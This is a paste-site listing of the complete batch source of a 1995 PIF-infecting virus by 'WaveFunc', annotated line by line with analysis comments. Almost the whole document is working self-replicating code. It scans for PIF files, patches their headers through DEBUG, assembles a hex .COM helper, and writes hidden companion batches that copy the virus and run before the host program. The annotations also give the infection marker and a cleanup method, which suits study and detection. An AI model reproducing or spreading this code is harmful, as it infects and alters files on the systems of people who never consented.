FlyFar

Windows PIF Virus - WaveFunc May 13, 1995 - Source Code

Mar 12th, 2023
Batch 3.49 KB | Cybersecurity | 0 0
  1. :: Windows PIF Virus (in batch!)
  2. :: Prog by WaveFunc May 13, 1995
  3. :: (these comments will not replicate)
  4. ::
  5. :: This is a virus that 'infects' PIF files, used by Windows to
  6. :: run DOS programs. It works by creating hidden companion batches
  7. :: containing copies of this then altering the PIF file so that the
  8. :: companion batch runs first. After the companion runs it runs the
  9. :: original host program, the name of which is encoded into the
  10. :: companion. The pif files are marked so that they will not be
  11. :: re-infected. Only PIFs are affected, no changes are made to
  12. :: the infected programs. To 'cure', use PIFEDIT to restore the
  13. :: original filenames then delete the hidden files.
  14. ::
  15. @echo off
  :: [analysis] Default entry path (no dispatcher arguments): run the
  :: replication pass in a child shell, start the host program, then
  :: evaluate the date/time trigger. These notes spell the tag as PIFV
  :: in upper case so they stay outside the case-sensitive find filter
  :: on listing line 114.
  16. :: host filename...
  :: [analysis] Every companion gets its own copy of this assignment
  :: (written on listing line 113), so the original program name of an
  :: altered PIF can be read back from the companion during cleanup.
  17. set pifvo=LIST.COM
  18. :: loop dispatcher...
  :: [analysis] Re-entry point: when the first argument is the tag, the
  :: second argument (go, hst or inf) selects the label to jump to.
  19. if '%1=='PiFV goto PiFV_%2
  20. :: run the virus!
  :: [analysis] The variable cleared here expands to nothing where it is
  :: appended on listing lines 22 and 36; presumably it is there only so
  :: those lines contain the tag and are copied by the find filter.
  21. set _PiFV=
  22. if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
  :: [analysis] A child interpreter (/e:5000 sets its environment size)
  :: re-runs this batch with the "go" argument and its output discarded.
  :: The scratch file PIFV! is removed afterwards if it was left behind.
  23. %comspec% /e:5000 /c %0 PiFV go>nul
  24. if exist PiFV! del PiFV!
  25. :: run the host
  :: [analysis] Up to nine caller arguments are saved and handed to the
  :: host through the "hst" re-entry, then both variables are cleared.
  26. set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
  27. call %0 PiFV hst
  28. set PiFVo=
  29. set PiFVcl=
  30. :: check for activation...
  :: [analysis] Trigger logic: DATE output without "sat" -> jump to the
  :: end; "sat" but no "7" in TIME output -> one-line banner; both ->
  :: the limerick below plus a wait for a key. The payload in this block
  :: only prints text. The .PIFV suffix on nul presumably still resolves
  :: to the NUL device and exists to make the line match the filter.
  31. echo.|date|find /i "sat">nul.PiFV
  32. if errorlevel 1 goto PiFV_end
  33. echo.|time|find "7">nul.PiFV
  34. if errorlevel 1 goto PiFV_msg
  35. set PiFV=echo
  36. cls%_PiFV%
  37. %PiFV%.
  38. %PiFV% There once was an Otter named Oscer
  39. %PiFV% Who claimed to know how to make water.
  40. %PiFV% "No more dams," he said, "use my water instead!"
  41. %PiFV% But the Elder Otter was not impressed.
  42. pause>nul.PiFV
  43. set PiFV=
  44. goto PiFV_end
  45. :PiFV_msg
  :: [analysis] Reached from listing line 34 when the date check matched
  :: but the time check did not; prints a single banner line and ends.
  46. echo [PiFV] by WaveFunc
  47. goto PiFV_end
  48. :PiFV_hst
  :: [analysis] "hst" re-entry: runs the recorded host program (value
  :: set on listing line 17) with the saved command line, so the user
  :: still sees the expected program start.
  49. %PiFVo% %PiFVcl%
  50. goto PiFV_end
  51. :PiFV_go
  :: [analysis] "go" re-entry, run inside the child interpreter. It
  :: resolves the path of this batch (trying a .bat suffix) and exits
  :: if the file cannot be found. The for loop covers only *.pif in
  :: the current directory, calling the "inf" re-entry once per file.
  52. set PiFVh=%0
  53. if not exist %PiFVh% set PiFVh=%0.bat
  54. if not exist %PiFVh% exit
  55. for %%a in (*.pif) do call %0 PiFV inf %%a
  56. exit PiFV
  57. :PiFV_inf
  :: [analysis] "inf" re-entry, one call per PIF file (third argument).
  :: Artifacts visible in this block: scratch files PIFV!, PIFV$.BAT,
  :: PIFV$$.BAT, PIFV$.COM and PIFV$$ (all deleted again), one hidden
  :: .BAT companion per altered PIF, and two edits inside the PIF itself.
  58. set PiFVp=%3
  59. :: get victim filename and infection marker
  60. :: from PIF file using debug...
  :: [analysis] The DEBUG script is built once and reused for later PIFs.
  :: It copies bytes 124-162 and 55E-561 of the loaded PIF behind a
  :: '@set fn=' prefix and writes them out as two small helper batches.
  :: Both "n" commands rename the output, so the PIF is only read here.
  61. if exist PiFV! goto PiFV_1
  62. echo m 124,162 524>PiFV!
  63. echo e 100 '@set fn='>>PiFV!
  64. echo m 524,562 108>>PiFV!
  65. echo n pifv$.bat>>PiFV!
  66. echo rcx>>PiFV!
  67. echo 47>>PiFV!
  68. echo w>>PiFV!
  69. echo m 55E,561 108>>PiFV!
  70. echo e 10C 0>>PiFV!
  71. echo n pifv$$.bat>>PiFV!
  72. echo rcx>>PiFV!
  73. echo 10>>PiFV!
  74. echo w>>PiFV!
  75. echo q>>PiFV!
  76. :PiFV_1
  :: [analysis] Running the helper batches loads the two extracted
  :: values into the environment; the helpers are deleted right after.
  77. debug %PiFVp%<PiFV!>nul
  78. call PiFV$
  79. set PiFVn=%fn%
  80. call PiFV$$
  81. set PiFVi=%fn%
  82. del PiFV$?.bat
  83. :: pifvn=orig filename
  84. :: pifvi=infection marker
  85. :: pifvp=pif filename
  86. :: pifvh=companion bat file
  87. :: skip infected or 'empty' pifs...
  :: [analysis] The marker comparison is what prevents re-processing a
  :: PIF; the same four bytes are therefore a usable scan signature.
  88. if '%PiFVi%=='PiFV goto PiFV_end
  89. if '%PiFVn%==' goto PiFV_end
  90. :: don't shadow command.com (be nice)
  91. echo %PiFVn%|find /i "command">nul
  92. if not errorlevel 1 goto PiFV_end
  93. :: infectable - create a companion batch...
  94. :: (the following code strips off the extension)
  :: [analysis] A 2Ah-byte .COM helper is entered as hex through DEBUG.
  :: Per the author's comment it strips the extension; it is used on
  :: listing line 104 to turn the host name into a 'set fn=' line.
  95. echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
  96. echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
  97. echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
  98. echo n pifv$.com>>PiFV$$
  99. echo rcx>>PiFV$$
  100. echo 2a>>PiFV$$
  101. echo w>>PiFV$$
  102. echo q>>PiFV$$
  103. debug<PiFV$$>nul
  104. echo %PiFVn%|PiFV$>PiFV$$.bat
  105. call PiFV$$
  106. set PiFVb=%fn%.bat
  107. del PiFV$?.*
  108. :: pifvb=new batch name
  109. :: do not shadow if comp has same name as host
  :: [analysis] The companion is skipped when its name equals the current
  :: host or the file already exists. Otherwise it is written as:
  :: '@echo off', the original program name in a 'set pifvo=' line, then
  :: every line of this batch that contains the tag. It is then marked
  :: hidden, so a listing that includes hidden files is needed to see it.
  110. if %PiFVo%==%PiFVb% goto PiFV_end
  111. if exist %PiFVb% goto PiFV_end
  112. echo @echo off>%PiFVb%
  113. echo set pifvo=%pifvn%>>%PiFVb%
  114. find "PiFV"<%PiFVh%>>%PiFVb%
  115. attrib %PiFVb% +h
  116. :: ...and point the PIF at the companion
  :: [analysis] This script has no "n" command, so "w" presumably writes
  :: back to the PIF named on the DEBUG command line: the tag goes to
  :: 15E and the companion name to 124. Assuming DEBUG's usual 100h load
  :: offset, those are file offsets 5Eh and 24h. Cleanup per the header:
  :: restore the name with PIFEDIT, then delete the hidden companion.
  117. echo e 15E 'PiFV',0>PiFV$$
  118. echo e 124 '%PiFVb%',0>>PiFV$$
  119. echo w>>PiFV$$
  120. echo q>>PiFV$$
  121. debug %PiFVp%<PiFV$$>nul
  122. del PiFV$$
  123. :: I think we're done!
  124. exit PiFV
  125. :PiFV_end
  :: [analysis] Common exit label for every path above; nothing runs
  :: after it, so control falls off the end of the batch.
  126. :: wonder how many bugs all this has in it? Only one
  127. :: way to find out...